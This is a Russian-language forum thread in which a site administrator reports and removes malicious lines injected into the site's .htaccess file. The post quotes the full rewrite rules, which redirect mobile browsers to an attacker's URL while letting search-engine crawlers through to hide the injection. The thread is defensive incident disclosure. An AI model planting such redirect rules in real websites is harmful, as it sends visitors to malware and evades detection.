ВНИМАНИЕ: по ссылкам, расположенным ниже, лазить не советую. Пока этот сайт вроде дохлый, но мало ли заработает, и кто нибудь что нибудь сможет оттуда подцепить.
Троян (если это дело можно обозвать трояном, скорее вредоносный скрипт) был успешно стерт.
Интересная штука. Обнаружился вчера, а сегодня был снесен.
В .htaccess корневого каталога blackstrip.ru дописал кто-то строки:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://googleapi14.ru/ero.php?l=1&r=4139&a=28 [L,R=302]
То бишь все что имело в юзер-агенте слова "android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone" - при попытке заходя на блэкстрип.ру перекидывалось на http://googleapi14.ru/ero.php?l=1&r=4139&a=28 (это дохлый неактивный сайт, но когда то наверное был рабочий)
googleapi##.ru бывает с разными числами вместо ##. Например, запрос гугла "googleapi16.ru" выдает кучу ссылок, по заходу на них аваст блокирует загрузку (типа тама троян-релокатор). Видимо их всех сделал один человек
А все что имело в юзер-агенте слова "accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer" спокойно проходило на сайт, и никуда не перекидывалось.
Так-то! Проверяйте свои .htaccess) и ставьте на них права пожощще, чтоб никто не дописывал в них ничего.
p.s. интересно это через форум или через скрипты дендиигр и галереи такие дела пролезают. как пишут докторвебовцы ( http://vms.drweb.com/virus+anatomy/?i=2136 ) :
Действует данная схема следующим образом: эксплуатируя уязвимости установленных на различных сайтах серверных приложений, таких как «движки» форумов и системы управления контентом (CMS), злоумышленники получают доступ к ресурсу и подменяют хранящийся на сервере файл .htaccess. В результате этих изменений при каждом обращении к взломанному сайту сервер проверяет user-agent пользователя, и в том случае, если клиентский браузер работает на мобильной платформе с поддержкой Java (в том числе Symbian OS и Android), происходит переадресация пользователя на принадлежащую злоумышленникам веб-страницу. Тут как раз эта самая тема.
Релокатор на сайте
- blackstrip
- Админ
- Сообщения: 1177
- Зарегистрирован: Ср янв 02, 2008 1:42 pm
- Откуда: Подольск
- Контактная информация:
- blackstrip
- Админ
- Сообщения: 1177
- Зарегистрирован: Ср янв 02, 2008 1:42 pm
- Откуда: Подольск
- Контактная информация:
Re: Релокатор на сайте
По результатам проверки скриптов были заделаны несколько sql-дырок) и поставлено 444 на .htaccess
Кто сейчас на конференции
Сейчас этот форум просматривают: нет зарегистрированных пользователей и 44 гостя